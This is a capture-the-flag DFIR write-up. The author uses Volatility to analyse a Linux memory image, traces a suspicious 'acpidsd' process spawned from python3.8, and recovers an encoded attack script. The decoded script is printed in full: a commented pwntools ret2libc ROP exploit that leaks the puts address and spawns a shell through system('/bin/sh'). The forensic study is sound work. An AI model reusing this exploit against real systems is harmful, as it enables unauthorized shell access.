ICMTC CTF — DFIR Challenge Writeup (Invade)

Ebrahim Mustafa
Jul 31, 2023

First, I used ‘vol.py’ and it didn’t work because this is not a Windows image. Then I used WinDbg and it didn’t work either. After some time, I searched with ‘strings’ for “windows”, and here was the big mistake: the tool gave me “windows 11 x64 kernel”. I started creating a profile for Windows 11, and this was the second big mistake. The organizer told me to try Linux, and I found the kernel and distribution version. I tried to download the Linux headers to create a profile, and this didn’t work on Kali.

I started searching for the right distribution and downloaded it, then my network connection said to me: “goodbye my brother”.

When I came back home, I downloaded the challenge again and started to work on it, and I found another error in Kali and ‘vol.py’, but I solved it.

The hard work starts now:

First, download Ubuntu from this site:

http://old-releases.ubuntu.com/releases/18.04.3/

Second, install it to a VM.

I installed ‘vol’ and started to create a profile:

Let’s check Kernel version:

Ok, let’s create a profile:

Now, let’s create the right profile. Let’s copy it to Kali to start the work. After we copy it, we will add the file to the right path to work.

This is the right path: `volatility/volatility/plugins/overlays/linux/`

First, check whether the profile has been added:

It’s added. Now, let’s start the analysis using ‘linux_pslist’, or use ‘linux_pstree’ for more detail if this is your first time working with Linux:

I found a suspicious process with the name “acpidsd” and “PID:4037”, and after looking up the PID, I found that the parent process is “python3.8” with “PID:4033”, and the child process is “sh”.

Ok, let’s get the process address using “linux_volshell”, “linux_proc_maps -p” or “linux_proc_maps_rb”. Then, inside “linux_volshell”, run “cc(pid=4037)”.
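The parent/child pattern described above can be checked for automatically. This is an added example, not part of the original writeup: it parses text in the column layout of Volatility 2's `linux_pslist` and flags a shell whose parent is an ordinary binary that was itself started by a script interpreter. The sample listing is constructed; the `sh` PID (4041), the `bash` and `systemd` rows, and all offsets, UIDs and times are assumptions.

```python
import re

# Constructed sample in the linux_pslist column layout (assumed: Offset, Name,
# Pid, PPid, ...). Only "python3.8"/4033 and "acpidsd"/4037 come from the writeup.
SAMPLE_PSLIST = """\
Offset             Name       Pid   PPid  Uid   Gid   DTB                Start Time
------------------ ---------- ----- ----- ----- ----- ------------------ ----------
0xffff9d0a1c2d8000 systemd    1     0     0     0     0x000000001a2b4000 2023-07-20 10:00:01 UTC+0000
0xffff9d0a1c9a0000 bash       3990  1     1000  1000  0x000000001b7c2000 2023-07-20 10:05:12 UTC+0000
0xffff9d0a1d4e4000 python3.8  4033  3990  1000  1000  0x000000001c1f6000 2023-07-20 10:07:40 UTC+0000
0xffff9d0a1d4e8000 acpidsd    4037  4033  1000  1000  0x000000001c3a8000 2023-07-20 10:07:41 UTC+0000
0xffff9d0a1d5f0000 sh         4041  4037  1000  1000  0x000000001c5d0000 2023-07-20 10:07:43 UTC+0000
"""

SHELLS = {"sh", "bash", "dash", "zsh"}
INTERPRETERS = re.compile(r"^(python|perl|ruby)[\d.]*$")

def parse_pslist(text):
    """Map pid -> (name, ppid). Rows are recognised by their leading 0x offset.
    Process names containing spaces are not handled by this simple split."""
    procs = {}
    for line in text.splitlines():
        f = line.split()
        if len(f) >= 4 and f[0].startswith("0x"):
            procs[int(f[2])] = (f[1], int(f[3]))
    return procs

def suspicious_chains(procs):
    """Return (interpreter, binary, shell) triples as (pid, name) pairs."""
    hits = []
    for pid, (name, ppid) in sorted(procs.items()):
        if name not in SHELLS or ppid not in procs:
            continue
        pname, gpid = procs[ppid]
        # A shell started directly by a shell or interpreter is ordinary usage.
        if pname in SHELLS or INTERPRETERS.match(pname) or gpid not in procs:
            continue
        gname, _ = procs[gpid]
        if INTERPRETERS.match(gname):
            hits.append(((gpid, gname), (ppid, pname), (pid, name)))
    return hits

if __name__ == "__main__":
    for chain in suspicious_chains(parse_pslist(SAMPLE_PSLIST)):
        print(" -> ".join(f"{n}({p})" for p, n in chain))
```

A hit is a lead for triage, not a verdict: legitimate test harnesses also drive binaries from Python, so the flagged binary still needs the memory-map review that follows.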

Let’s get the second flag.

Attack name:

I noticed “python3.8” and tried to dump the process, or find the file it runs, because the Python code didn’t load in memory.

I will use:

linux_dump_map -p 4037

and start analyzing the output with ‘strings *.vma’, searching for acpidsd.

Now I noticed /usr/bin/mtrr, that the old pwd is /home/egcert, and /usr/bin/acpidsd.

Let’s search the original “vmem” file for “mtrr” using “strings” and “grep”:

strings meme.vmem | grep -A 4 'mtrr'

I found this script:

After decoding it, we got this result:

I will use ChatGPT to explain what the code will do:

The full code is:

```python
from pwn import *

# Set architecture to amd64
context.arch = 'amd64'

# Define constants
K = 120

# Load the ELF binary
m = ELF("./acpidsd")

# Start a process to interact with the binary
x = m.process()

# Create a ROP gadget object for the binary
g = ROP(m)

# Call the "puts" function with the "puts" Global Offset Table (GOT) entry as an argument
g.call(m.symbols['puts'], [m.got["puts"]])

# Call the "processInput" function using ROP chaining
g.call(m.symbols["processInput"])

# Receive and discard some initial output from the process
x.recvuntil(b"\n")
x.recvuntil(b"\n")
x.recvuntil(b"\n")

# Craft the payload by chaining 'A' * K bytes and the ROP chain
V = [b"A" * K, g.chain()]
V = b"".join(V)

# Send the payload to the process
x.sendline(V)

# Receive the output from the process and extract the leaked address
y = u64(x.recvline("\n").rstrip().ljust(8, b"\x00"))

# Load the libc binary
s = ELF('/usr/local/libc6_2.27-3ubuntu1.6_amd64.so')

# Calculate the base address of the loaded libc using the leaked "puts" address
s.address = y - s.symbols["puts"]

# Create a ROP gadget object for the libc
M = ROP(s)

# Find the address of the "/bin/sh" string in libc and use it as an argument for the "puts" and "system" functions
# (the recovered script calls this through an undefined alias `u`; search() returns a generator, so next() takes the first match)
M.call("puts", [next(s.search(b"/bin/sh\x00"))])
M.call("system", [next(s.search(b"/bin/sh\x00"))])

# Call the "exit" function to gracefully terminate the process
M.call("exit")

# Craft the final payload by chaining 'A' * K bytes and the libc ROP chain
n = [b"A" * K, M.chain()]
n = b"".join(n)

# Send the final payload to the process
x.sendline(n)

# Interact with the process to gain control and access the shell
x.interactive()
```

And this is the result:

Attack name is “ropchain” and the function is “puts”.

The flag is:

EGCERT(0x15d9e000,ROPCHAIN,puts)
